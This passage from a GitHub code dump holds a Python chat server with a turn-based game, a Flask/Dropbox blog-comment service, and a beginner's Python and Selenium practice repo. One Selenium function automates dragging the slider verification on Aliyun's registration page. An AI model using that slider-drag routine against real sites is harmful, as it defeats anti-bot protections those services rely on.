\"search\":\n term = msg[\"target\"]\n from_name = self.logged_sock2name[from_sock]\n print('search for ' + from_name + ' for ' + term)\n search_rslt = (self.indices[from_name].search(term)).strip()\n print('server side search: ' + search_rslt)\n mysend(from_sock, json.dumps({\"action\":\"search\", \"results\":search_rslt}))\n# =============================================================================\n# write poem\n# =============================================================================\n elif msg[\"action\"] == \"write\":\n mysend(from_sock, json.dumps({\"action\":\"write\", \"results\":generator.generator()}))\n#==============================================================================\n# the \"from\" guy has had enough (talking to \"to\")!\n#==============================================================================\n elif msg[\"action\"] == \"disconnect\":\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n self.group.disconnect(from_name)\n the_guys.remove(from_name)\n if len(the_guys) == 1: # only one left\n g = the_guys.pop()\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"disconnect\"}))\n#==============================================================================\n# the \"from\" guy really, really has had enough\n#==============================================================================\n elif msg['action'] == 'file exchange':\n from_name = self.logged_sock2name[from_sock]\n the_guys = self.group.list_me(from_name)\n for g 
in the_guys[1:]:\n to_sock = self.logged_name2sock[g]\n mysend(to_sock, json.dumps({\"action\":\"file exchange\", \"from\":msg[\"from\"], \"file\":msg[\"file\"]}))\n# =============================================================================\n# Try to start a game \n# =============================================================================\n \n elif msg['action'] == 'game':\n rules = 'select one option from the list each time \\n'\n rules += \"\\ndefense wave: blocks a wave (it can NOT block a greater wave or any stone!) \\n\"\n rules += \"wave energy +1: save energy to send a (greater) wave next round \\n\"\n rules += \"stone +1: fetch a stone to throw in the next round \\n\"\n rules += \"In the same round, wave beats stone, stone 2 beats wave \\n\"\n rules += \"If your enemy throws a stone while you are fetching a stone, your own stone protects you \\n \"\n from_name = self.logged_sock2name[from_sock]\n if not msg['connect']:\n if len(self.group.list_me(from_name)) != 2:\n mysend(from_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'A game needs exactly two people in the room.'}))\n other_guys = self.group.list_me(from_name)[1:]\n for g in other_guys:\n to_sock = self.logged_name2sock[g]\n print('connection failed')\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'A game needs exactly two people in the room.'}))\n else:\n try:\n for g in self.group.list_me(from_name):\n to_sock = self.logged_name2sock[g]\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":True,\"message\":'There you go.\\n'+rules}))\n print(\"Connecting two players\")\n except Exception as e:\n print('failed to connect players:', e)\n else:\n try:\n # the opponent only exists once exactly two players share the room\n the_other = self.group.list_me(from_name)[1]\n if from_name not in self.players:\n print('found a new player')\n print('creating object')\n self.players[from_name] = player.Player(str(from_name))\n print('adding to the list')\n mysend(from_sock,json.dumps({\"action\":\"game\",'options':self.players[from_name].get_option(),'connect':True,'message':\"select one option\"}))\n print('sending message')\n else:\n print('found '+from_name)\n print(self.players[from_name].choice)\n self.players[from_name].set_choice(msg['choice'])\n print('choice set for '+ str(from_name)+' '+self.players[from_name].choice)\n if (self.players[the_other].choice != ''):\n print('both have choice')\n two_choice = ''\n for p in self.players.values():\n two_choice += (p.name + ': ' + p.choice + ' ')\n result = self.players[from_name].fight(self.players[the_other])\n print('got result')\n \n while result == 'tie':\n print('result is tie')\n result = ''\n for g in self.group.list_me(from_name):\n print(g)\n print('updating info')\n self.players[g].update()\n self.players[g].clear_choice()\n print('finding sock')\n to_sock = self.logged_name2sock[g]\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":True,\"message\":'tie' +' '+ two_choice ,'options':self.players[g].get_option()}))\n print('tie, sending msgs to '+ str(g))\n \n my_sock = self.logged_name2sock[from_name]\n to_sock = self.logged_name2sock[the_other]\n if result == True:\n result = ''\n mysend(my_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you win'+' '+two_choice}))\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you lose'+' '+two_choice}))\n self.players = {}\n elif result == False:\n result = ''\n mysend(my_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you lose'+' '+two_choice}))\n mysend(to_sock,json.dumps({\"action\":\"game\",\"connect\":False,\"message\":'you win'+' 
'+two_choice}))\n self.players = {}\n else:\n print('NOT both have choice')\n pass\n except Exception as e:\n print('game action failed:', e)\n \n \n# =============================================================================\n# unknown action, or the client died unexpectedly\n# =============================================================================\n\n else:\n #client died unexpectedly\n self.logout(from_sock)\n\n#==============================================================================\n# main loop, loops *forever*\n#==============================================================================\n def run(self):\n print('starting server...')\n while True:\n read,write,error=select.select(self.all_sockets,[],[])\n print('checking logged clients..')\n for logc in list(self.logged_name2sock.values()):\n if logc in read:\n self.handle_msg(logc)\n print('checking new clients..')\n for newc in self.new_clients[:]:\n if newc in read:\n self.login(newc)\n print('checking for new connections..')\n if self.server in read:\n #new client request\n sock, address=self.server.accept()\n self.new_client(sock)\ndef main():\n server=Server()\n server.run()\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.48148149251937866, "alphanum_fraction": 0.5856481194496155, "avg_line_length": 27.866666793823242, "blob_id": "749132276f55174c3160ba92052611e60860a5ce", "content_id": "6ca36f41d7d6138a620f93b3635c2a485dbe0b80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 130, "num_lines": 15, "path": "/generator.py", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 10 14:46:01 2018\n\n@author: Lenovo\n\"\"\"\nimport random\ndef generator():\n with open(\"fixed_two_2.txt\", \"r\") as f_20: \n word_22 = f_20.readlines()\n \n with open(\"fixed_three_2.txt\", \"r\") as f_32: \n word_32 = f_32.readlines()\n \n # build a seven-character line from two two-character words and one three-character word\n # (assumes both word files contain at least 101 lines)\n return word_22[random.randint(0,100)].strip()+ word_22[random.randint(0,100)].strip() + word_32[random.randint(0,100)].strip()" }, { "alpha_fraction": 0.7725118398666382, "alphanum_fraction": 0.7725118398666382, "avg_line_length": 23.55555534362793, "blob_id": "53178d9e5383ce0d75072837c0139b6b77636c78", "content_id": "0fd36a1318f9e2c8b5e685e6a623c8d40e6886fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 211, "license_type": "no_license", "max_line_length": 70, "num_lines": 9, "path": "/README.md", "repo_name": "J1E1D71/ICS_Final", "src_encoding": "UTF-8", "text": "# ICS FINAL PROJECT\n\nThis is a multi-platform chat application written in Python, with a GUI.\n\nThis is a project based on the initial code from Zhang Zheng, NYU Shanghai.\n\nThis is for testing PyCharm.\n\nThis is another test." } ]
5
ravgeetdhillon/komments
https://github.com/ravgeetdhillon/komments
0be1790c4b981e294c98ae46aecb1db7ae529766
1012e05e31260573c7a3dd0bec68dfb4c0797a43
2fa5868015fe2e1d5c086879839c7ba22c1b4540
refs/heads/master
2023-05-27T05:12:18.201891
2019-11-19T05:44:23
2019-11-19T05:44:23
214,606,420
3
0
null
2019-10-12T08:08:44
2022-06-10T12:00:00
2023-05-22T22:30:34
Python
[ { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 14.5, "blob_id": "fb5089af51ab017d31a1952c3d3caf35624a49a0", "content_id": "5419b3e6d9dc17c33d412cf568c7d8fea54198f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 62, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "dropbox==9.4.0\nFlask==1.1.1\ngunicorn==19.9.0\nrequests==2.22.0\n" }, { "alpha_fraction": 0.7304104566574097, "alphanum_fraction": 0.7360074520111084, "avg_line_length": 40.230770111083984, "blob_id": "6ba06df8d1ecd48db73543f58342371f4c9c718d", "content_id": "420d3998bf8da945463b15afd2706ca88ded0160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 180, "num_lines": 26, "path": "/README.md", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "## Komments\n\nA Flask Web App to manage comments for a blog.\n\n## Basics\n\n#### Installation\n\n1. Create a personal app in your Dropbox.\n2. Create an `ACCESS TOKEN` for your app. (Don't share it with anyone!)\n3. Clone this repository locally, install all the pip dependencies and adjust the `SITE_NAME` variable in the `app.py` file to your blog site.\n4. Deploy the web app on any Python hosting platform like Heroku.\n5. Create a `DROPBOX_ACCESS_TOKEN` environment key on your platform and add your Dropbox access token to this key.\n6. You are ready to go.\n\n#### Adding comments\n\nFrom your app, send a **POST** request to `<site.url>/add` URL with `name`, `content`, `blog` as parameters. The comments are saved to the `comments.json` file in your Dropbox app.\n\n#### Getting comments\n\nFrom your app, send a **POST** request to `<site.url>/get` URL with `blog` as a parameter. 
The comments are then fetched from the `comments.json` file in your Dropbox app.\n\n## Support\n\nIn case of any anomalies, please file an issue [here](https://github.com/ravgeetdhillon/komments/issues).\n" }, { "alpha_fraction": 0.5818815231323242, "alphanum_fraction": 0.5849990844726562, "avg_line_length": 28.797813415527344, "blob_id": "a9f7e0fb147d64c2be291af7c1c71ca971b6c9af", "content_id": "297adbd04895a86555e78d93ea72f1e44192a50c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5453, "license_type": "no_license", "max_line_length": 185, "num_lines": 183, "path": "/app.py", "repo_name": "ravgeetdhillon/komments", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify, request, escape, json, Response\nfrom datetime import datetime\nimport dropbox\nimport requests\nimport os\n\n\nSITE_NAME = '' # for example google.com\nDROPBOX_ACCESS_TOKEN = os.environ.get('DROPBOX_ACCESS_TOKEN')\nCOMMENTS_FILE = '/comments.json'\nCOMMENTS_BACKUP_FILE = f'/comments_backup_{datetime.now().isoformat()}.json'\n\n\ndef createRequest(url):\n r = requests.get(url)\n data = r.json()\n return data\n\n\ndef addComment(name, content, blog):\n return {\n 'name': name,\n 'content': content,\n 'blog': blog,\n 'time': datetime.now().isoformat(),\n }\n\n\ndef getTempLink(dbx):\n link = dbx.files_get_temporary_link(COMMENTS_FILE).link\n return link\n\n\ndef saveAndSendComments(dbx, comments):\n with open('comments_local.json', 'w', encoding='utf-8') as f:\n json.dump(comments, f, ensure_ascii=True, indent=2)\n\n with open('comments_local.json', 'rb') as f:\n dbx.files_upload(f=f.read(), path=COMMENTS_FILE, mode=dropbox.files.WriteMode.overwrite)\n return True\n\n\ndef sendResponse(data):\n return Response(\n json.dumps(data),\n mimetype=\"text/json\",\n headers = {\n \"Access-Control-Allow-Origin\":\"*\"\n }\n )\n\n\ndef allowAccess():\n # default to empty strings so missing headers cannot raise an AttributeError\n useragent = request.headers.get('User-Agent') or ''\n referer = request.headers.get('Referer') or ''\n if ( 'mozilla' in useragent.lower() or 'chrome' in useragent.lower() or 'safari' in useragent.lower() ) and SITE_NAME in referer.lower():\n return True\n\n\napp = Flask(__name__)\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef index():\n return sendResponse( [request.headers.get('User-Agent'), request.headers.get('Referer'), 'hello.'] )\n\n\[email protected]('/get', methods=['POST'])\ndef get():\n errors = []\n\n if not( allowAccess() ):\n errors.append('Restricted access only.')\n return sendResponse(errors)\n \n try:\n dbx = dropbox.Dropbox(DROPBOX_ACCESS_TOKEN)\n dbx.users_get_current_account()\n except Exception:\n errors.append('No access allowed.')\n return sendResponse(errors)\n\n if request.method == 'POST':\n if 'blog' in request.form:\n blog = escape( request.form['blog'].strip() )\n try:\n float(blog)\n errors.append('Not a valid blog attribute.')\n except ValueError:\n pass\n else:\n errors.append('No blog attribute available.')\n \n if len(errors) != 0:\n return sendResponse(errors)\n \n link = getTempLink(dbx)\n all_comments = createRequest(link)\n final_comments = [comment for comment in all_comments if comment['blog'] == blog]\n final_comments = sorted(final_comments, key=lambda k: (k['time']), reverse=True)\n\n return sendResponse(final_comments)\n else:\n errors.append('Not a valid request method. 
Only POST is accepted.')\n \n return sendResponse(errors)\n\n\[email protected]('/add', methods=['POST'])\ndef add():\n errors = []\n\n if not( allowAccess() ):\n errors.append('Restricted access only.')\n return sendResponse(errors)\n\n try:\n dbx = dropbox.Dropbox(DROPBOX_ACCESS_TOKEN)\n dbx.users_get_current_account()\n except Exception:\n errors.append('No access allowed.')\n return sendResponse(errors)\n\n if request.method == 'POST':\n if 'name' in request.form:\n name = escape( request.form['name'].strip() )\n try:\n float(name)\n errors.append('Not a valid name attribute.')\n except ValueError:\n if len(name) > 20:\n errors.append('Maximum size for name is 20 chars.')\n else:\n errors.append('No name attribute available.')\n \n if 'content' in request.form:\n content = escape( request.form['content'].strip() )\n if len(content) > 500: # validate the comment body, not the name\n errors.append('Maximum size for a comment is 500 chars.')\n else:\n errors.append('No content attribute available.')\n\n if 'blog' in request.form:\n blog = escape( request.form['blog'].strip() )\n try:\n float(blog)\n errors.append('Not a valid blog attribute.')\n except ValueError:\n pass\n else:\n errors.append('No blog attribute available.')\n\n if len(errors) != 0:\n return sendResponse(errors)\n\n link = getTempLink(dbx)\n all_comments = createRequest(link)\n all_comments.append( addComment(name, content, blog) )\n\n try:\n with open('comments_local.json', 'w', encoding='utf-8') as f:\n json.dump(all_comments, f, ensure_ascii=True, indent=2)\n\n with open('comments_local.json', 'rb') as f:\n dbx.files_upload(f=f.read(), path=COMMENTS_FILE, mode=dropbox.files.WriteMode.overwrite)\n except Exception:\n errors.append('Comments couldn\\'t be saved.')\n \n if len(errors) != 0:\n return sendResponse(errors)\n\n final_comments = [comment for comment in all_comments if comment['blog'] == blog]\n final_comments = sorted(final_comments, key=lambda k: (k['time']), reverse=True)\n\n return sendResponse(final_comments)\n else:\n errors.append('Not a valid request method. Only POST is accepted.')\n\n return sendResponse(errors)\n\n\nif __name__ == '__main__':\n app.run()\n" } ]
3
kahwasaurus/Factorial
https://github.com/kahwasaurus/Factorial
40f04ad51a973a68bc0b3f5f4aa74715041c5c66
af4ea4e67fc153beb6df80172dcc0915e17b59e3
89d0316bf132b05b9583f09cd97f59ed782ec6d9
refs/heads/master
2020-05-22T15:21:48.677781
2017-03-12T04:04:25
2017-03-12T04:04:25
84,698,530
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6978852152824402, "alphanum_fraction": 0.7160120606422424, "avg_line_length": 22.714284896850586, "blob_id": "c9da668e8e6a87176c8da33db1a393ca79351929", "content_id": "dd942f57d220879934ed85ac86bfedd66436a970", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 64, "num_lines": 14, "path": "/factorial.py", "repo_name": "kahwasaurus/Factorial", "src_encoding": "UTF-8", "text": "num = input(\"Enter a number to factorialize: \\n\")\nfactorial=1\nfor i in range(1,num+1):\n\tfactorial=factorial*i\nprint \"The factorial of\",num,\"is\",factorial\n\n\nusernum = input(\"Enter the number you want to factorialize: \\n\")\nfactorial = 1\ni = 1\nwhile(i<=num):\n\tfactorial = factorial*i\n\ti=i+1\nprint \"The factorial of\",num,\"is\",factorial" } ]
1
qianpeng-qp/pytest1
https://github.com/qianpeng-qp/pytest1
889b223542f22d6f2121bd12aa2ee770f9ef460d
6eb3007547ddeabed07b46cecaaffde9d8e32e64
1c4fc7a849df519615b3ae41b7578f1e9fb4fe0d
refs/heads/master
2021-01-06T10:44:16.612503
2020-03-03T13:39:34
2020-03-03T13:39:34
241,301,054
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6108949184417725, "alphanum_fraction": 0.6225680708885193, "avg_line_length": 22.170454025268555, "blob_id": "e138fbbc5a3cf3d5898bb3d2890918d0024d258d", "content_id": "56fe5d4a3274b34ad826a66e309383b8b2d8165a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "no_license", "max_line_length": 64, "num_lines": 88, "path": "/src/hanshu/hanshu.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月10日\n\n@author: asus\n'''\n# 定义函数\ndef greet_user():\n '''显示问候语''' #文档注释语\n print(\"hello\")\ngreet_user()\n\ndef greet_user1(name):\n print(name)\ngreet_user1(\"lili\")\ndef describe_dog(name,age):\n print(name+str(age))\ndescribe_dog(\"qqq\", 10)\ndescribe_dog(name=\"bbb\", age=20)#关键字实参,确保不会传错\n\ndef describe_cat(age,name=\"dd\"):# 注意将默认参数写后面\n print(name+str(age))\ndescribe_cat(age=20)\ndescribe_cat(15,\"ss\")\n\n#return 返回值\ndef get_name(first_name,last_name,middle_name=''): #中间名可以选择\n '''返回完整姓名'''\n full_name=first_name+middle_name+last_name\n return full_name.title()\nname=get_name(\"aaa\", \"bbb\")\nprint(name)\nname =get_name(\"111\", \"www\", \"sss\")\nprint(name)\n\n#返回字典\ndef build_person(first_name,last_name):\n person={'first':first_name,'last':last_name}\n return person\nperson = build_person(\"aaa\", \"bbb\")\nprint(person)\n\nwhile True:\n print(\"tell me name:\")\n f_name=input(\"f_name:\")\n if f_name =='q':\n break\n l_name=input(\"l_name:\")\n if l_name=='q':\n break\n name = build_person(f_name,l_name)\n print(name)\n #函数中修改列表\ndef print_modle(up_designs,com_modles): \n \"\"\"模拟打印每个设计,直到打印完成,打印完后移到com_modles\"\"\"\n while up_designs:\n com_design=up_designs.pop()\n print(\"print modle:\"+com_design)\n com_modles.append(com_design)\n print(up_designs)\ndef show_modle(com_modles):\n print(\"all:\")\n for modles in com_modles:\n print(modles)\nup_designs =['a','b','c']\ncom_modles=[]\nprint_modle(up_designs[:], com_modles) #禁止函数修改列表:\nshow_modle(com_modles)\n\n#传递任意数量的实参+位置实参\ndef make_pizza(size,*toppings):\n \"\"\"打印顾客所有配料+尺寸\"\"\"\n print(str(size))\n for topping in toppings:\n print(\"-\"+topping)\nmake_pizza(12,'aaa')\nmake_pizza(13,'bbbb','bbbb','ccc')\n\n#使用任意数量关键字实参\ndef build_pro(first,last,**user_info):\n \"\"\"创建字典,包含一切用户信息\"\"\"\n pro={}\n pro['first_name']=first\n pro['last_name']=last\n for key,value in user_info.items():\n pro[key] =value\n return pro\nuser_pro = build_pro('a','b',location='ccc',field='ddd')\nprint(user_pro)\n\n\n\n \n \n\n\n\n\n" }, { "alpha_fraction": 0.49125364422798157, "alphanum_fraction": 0.558309018611908, "avg_line_length": 16.149999618530273, "blob_id": "48ccaecb46ea6d46abd26a0a67484071316cc9c7", "content_id": "7799da2428b91f94aeeb5ae04649318f69000d3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 46, "num_lines": 40, "path": "/src/learn/day3_2.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def show1(**arg): # 字典\n print(arg, type(arg))\n\n\nshow1(n1=78)\n\n\ndef show2(*arg): # 元组\n print(arg, type(arg))\n\n\nshow2(78)\n\n\ndef show3(*args, **kwargs):\n print(args, type(args))\n print(kwargs, type(kwargs))\n\n\nshow3(11, 22, 33, 44, n=1, m=3)\nl = [11, 22, 33, 44]\nd = {'n': 1, 'm': 3}\nshow3(l, d) # l和d做为一个整体\nshow3(*l, **d) # 使用*区分,两*字典\n\ns1 = '{0} is {1}'\n# result = s1.format('alex','zb')\nl = ['alex', '2b']\nresult = s1.format(*l) # 
使用*区分\nprint(result)\n\ns2 = '{name} is {acter}'\n# result = s2.format(name='alex', acter='sb')\nd = {'name': 'alex', 'acter': 'sb'}\nresult = s2.format(**d)\nprint(result)\n\nfunc = lambda a: a + 1 # 创建函数a,并函数内容a+1 并返回结果\nret = func(99)\nprint(ret)\n" }, { "alpha_fraction": 0.6465517282485962, "alphanum_fraction": 0.6482758522033691, "avg_line_length": 37.66666793823242, "blob_id": "2d7d9a24cdd0daffc44fdb9343c538e874174abd", "content_id": "20c27813d06b91f8a4c0788209ac502c495639a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 54, "num_lines": 15, "path": "/src/test_9_6/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Restaurant ():\n \"\"\"开店店\"\"\"\n def __init__(self,restaurant_name,cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0\n def describe_restaurant(self):\n print(\"打印店名:\"+self.restaurant_name)\n def open_restaurant(self):\n print(\"开张:\"+self.cuisine_type)\n def set_number_served(self,number):\n self.number_served=number\n print(\"number_served\"+str(self.number_served))\n def increment_number_served(self,devop_people):\n # increment the existing counter; number_people was never defined\n self.number_served += devop_people\n" }, { "alpha_fraction": 0.6747151613235474, "alphanum_fraction": 0.6893651485443115, "avg_line_length": 33.13888931274414, "blob_id": "b787369a7b530324fe64d1264fdb7bf0c54b8af0", "content_id": "9df06c1234083a0f825647806865a913d9e0bf49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 121, "num_lines": 45, "path": "/src/test/seleium_3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from aip import AipOcr\nfrom selenium import webdriver\nimport time\n\ndef yuansu():\n driver = webdriver.Chrome()\n driver.get('https://search.suning.com/iPhone%2011/')\n eles = driver.find_elements_by_css_selector('span.def-price')\n for i in eles:\n # 获取元素属性值\n sku = i.get_attribute('datasku')\n band_id = i.get_attribute('brand_id')\n color = i.value_of_css_property('color') #获取颜色\n print(sku,band_id)\n\n driver.get('https://www.baidu.com')\n name = driver.find_element_by_css_selector('#kw').get_property('name') #仅能获取name\n driver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\n driver.find_element_by_class_name(\"s_ipt\").submit() #enter键\n print(name)\n\n\ndef iframe():\n driver = webdriver.Chrome()\n driver.get('https://login.anjuke.com/login/form')\n iframe = driver.find_element_by_id('iframeLoginIfm')\n driver.switch_to.frame(iframe)# 切换到iframe里\n driver.find_element_by_id('phoneIpt').send_keys('13020207396')\n driver.find_element_by_id('smsIpt').send_keys('123311')\n driver.switch_to.parent_frame() #返回上一层\n #driver.switch_to.default_content() #返回最外层\n driver.find_element_by_xpath('//a[contains(text(),\\'关于安居客\\')]').click()\n\ndef roll():\n driver = webdriver.Chrome()\n driver.get('https://account.aliyun.com/register/register.htm')\n ifram = driver.find_element_by_id('alibaba-register-box')\n driver.switch_to.frame(ifram)\n slides = driver.find_element_by_css_selector('div[id=\"nc_1__scale_text\"]')\n slides.location_once_scrolled_into_view #确认x,y完整\n print(slides.location)\n\n width = slides.value_of_css_property('width')\n width = int(width.split('px')[0]) #长度\n drag = driver.find_element_by_css_selector('span[id=\"nc_1_n1z\"]')\n 
print(\"width:\",width)\n # 在元素上按下鼠标左键,移动鼠标,释放鼠标,执行。\n ActionChains(driver).move_to_element(drag).click_and_hold().move_by_offset(width,0).release().perform()\n\n\ndef window():\n driver = webdriver.Chrome()\n # 最大化窗口\n driver.maximize_window()\n # 最小化\n driver.minimize_window()\n # 全屏\n driver.fullscreen_window()\n\n driver.get(\"https://www.baidu.com\")\n driver.find_element_by_css_selector('#kw').send_keys(\"helloworld\")\n driver.find_element_by_css_selector('#kw').submit()\n\n # 后退\n driver.back()\n # 前进\n driver.forward()\n # 刷新\n driver.refresh()\n\n # 退出\n driver.quit()\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport selenium.webdriver.support.expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\ndriver = webdriver.Chrome()\ndriver.maximize_window()\n# 设置页面加载时间\ndriver.set_page_load_timeout(30)\n# 全局等待某个元素显示出来\ndriver.implicitly_wait(20)\ndriver.get('https://www.juhe.cn/?')\nstart_time = time.perf_counter()\niframe1 = driver.find_element_by_css_selector('iframe[id=\"layui-layer-iframe1\"]')\ndriver.switch_to.frame(iframe1)\ntry:\n\n # ele = driver.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]')\n #EC.筛选出xx BY是获取元素\n ele= WebDriverWait(driver,15,0.1).until(EC.presence_of_element_located((By.CSS_SELECTOR,'div.inputWrap > [id=\"mobilephone\"]')))\n ele.send_keys('12345')\nexcept NoSuchElementException as e:\n print(driver.page_source)\n print(e)\nfinally:\n driver.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]').send_keys('11111')\n\n pass\nend_time = time.perf_counter()\nprint(f\"查找元素一共使用 时间: {end_time-start_time}\")\n\n# ele = WebDriverWait(driver,6,0.3).until(lambda x:x.find_element_by_css_selector('div.inputWrap > [id=\"mobilephone\"]'))\n\n# ele.send_keys('1234')" }, { "alpha_fraction": 0.5854567885398865, "alphanum_fraction": 0.6028589010238647, "avg_line_length": 26.758621215820312, "blob_id": "0ab5f3c7d1094641c2d3da60f09682f457dea345", "content_id": "7a9ca0096a501fa32c855f0b21b29510ee118b8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1855, "license_type": "no_license", "max_line_length": 63, "num_lines": 58, "path": "/src/json_1/number_write1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import json\nnumbers = [2,3,4,5,11,13]\nfilename = 'number.json'\nwith open(filename, 'w') as f_obj:\n json.dump(numbers, f_obj) #json.dump 存储这组数字\n\nwith open(filename) as f_obj:\n numbers = json.load(f_obj) #json.load 将json存储到内存,可以使用\nprint(numbers)\n\n#如果已有用户名,则读取,否则写入\nfilename1 = 'username1.json'\n# username = input(\"输入姓名:\")\n# with open(filename1, 'w') as f_obj1: # 存储到json文件\n# json.dump(username, f_obj1)\n# print(\"remember:\"+username)\n# with open(filename1) as f_obj2: # 存储到内存并读取\n# username = json.load(f_obj2)\n# print(\" user_naem :\" + username)\ndef greet_user():\n \"\"\"问候用户并指出名字\"\"\"\n try:\n with open(filename1) as f_obj2: # 存储到内存并读取\n username = json.load(f_obj2)\n except FileNotFoundError:\n username = input(\"输入姓名:\")\n with open(filename1, 'w') as f_obj1: # 存储到json文件\n json.dump(username, f_obj1)\n print(\"remember:\"+username)\n else:\n print(\" user_naem :\" + username)\ngreet_user()\n\ndef get_stored_username():\n \"\"\"如果存储了姓名就打出\"\"\"\n try:\n with open(filename1) as f_obj2: # 存储到内存并读取\n username = json.load(f_obj2)\n except FileNotFoundError:\n return None\n else:\n return username\n\ndef 
get_new_username():\n \"\"\"提示输入新用户名\"\"\"\n username = input(\"输入姓名:\")\n with open(filename1, 'w') as f_obj1: # 存储到json文件\n json.dump(username, f_obj1)\n print(\"remember:\" + username)\n\ndef greet_user():\n \"\"\"问候用户并指出名字\"\"\"\n username = get_stored_username()\n if username:\n print(\"welcome\"+ username)\n else:\n username = get_new_username()\ngreet_user()" }, { "alpha_fraction": 0.548701822757721, "alphanum_fraction": 0.580287754535675, "avg_line_length": 20.069686889648438, "blob_id": "e2529ce4942da1bdcdc120dcae661e3be17e678f", "content_id": "d5d36b480dc91d769e74778d8ec8807009b20660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6741, "license_type": "no_license", "max_line_length": 108, "num_lines": 287, "path": "/src/pydevtest.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "# from nt import remove\n# from audioop import reverse\nfrom idlelib.colorizer import color_config\n\nmessage = \"hello world\"\nprint(message)\nprint(message.title())\n# 首字母大写\nprint(message.upper() + \" \" + message.lower())\n# 大小写\nprint(\"\\t age \\n\")\n# t换行 \\n空格\nlanguage = ' python '\nprint(language.rstrip())\n# 去后面除空吧\nprint(language.lstrip())\n# 去前面除空吧\nprint(language.strip())\n# 去两端\nprint(1 + 2)\nage = 25\nmessage = \"happy\" + str(age) + \"day\"\n# int转string\nprint(message)\n\nshuzu = [1, 2, 3, 4, 'sajsdak']\nprint(shuzu)\nprint(shuzu[4])\n\nprint(language + shuzu[4].title())\n\nshuzu[2] = 'saj ajsd'\nprint(shuzu[2])\n# 修改\n\nshuzu.append('jskal ;')\n# appened 末尾添加\nprint(shuzu)\n\nprint(shuzu.index(4))\n\nshuzu.insert(1, 'klasd')\nprint(shuzu)\n# insert 从xx位置添加\n\ndel shuzu[0]\n# 删除XX位置\nprint(shuzu)\n\npop = shuzu.pop(2) # 删除末尾\nprint(shuzu)\nprint(pop)\n\nshuzu.remove(2) # 删除值\nprint(shuzu)\n\nshuzu.insert(3, 'ttt')\na = 'ttt'\nprint(shuzu)\nshuzu.remove(a)\nprint(shuzu)\n\nshuzu[1] = 'waas'\nshuzu.sort() # 永久性排序\nprint(shuzu)\nshuzu.sort(reverse=True) # 倒叙永久\nprint(shuzu)\n\nprint(shuzu.count('4'))\n\n# 函数sorted\nprint(sorted(shuzu)) # 非永久正序 \n\nshuzu.reverse() # 倒着打印\nprint(shuzu)\nprint(len(shuzu)) # 数组长度\n\n# for循环-----------------------------------------------------------------------------\nfor shu in shuzu: # 定义shu 打印数组 循环\n print(\"lalalal\\t\" + shu.title())\nprint(\"hello world\")\n\n# unexpected indent 不必要的缩进 expected an indented block 应要缩进\n\nfor value in range(1, 5): # range生产数字 1到4 不会包含5\n print(value)\nnumber = list(range(1, 5)) # list 数字转换列表\nprint(number)\neven_number = list(range(1, 10, 2)) # range 指定步长\nprint(even_number)\n\nsquare = []\nfor value in range(1, 5):\n square = value ** 2 # ** 平方\n print(square)\nsquare1 = []\nfor value in range(1, 5):\n # square1 = value**2\n square1.append(value ** 2)\nprint(square1)\n\nprint(min(square1) + max(square1) + sum(square1))\n\nsquare2 = [value ** 2 for value in range(1, 5)] # 缩写\nprint(square2)\n\nnumber1 = 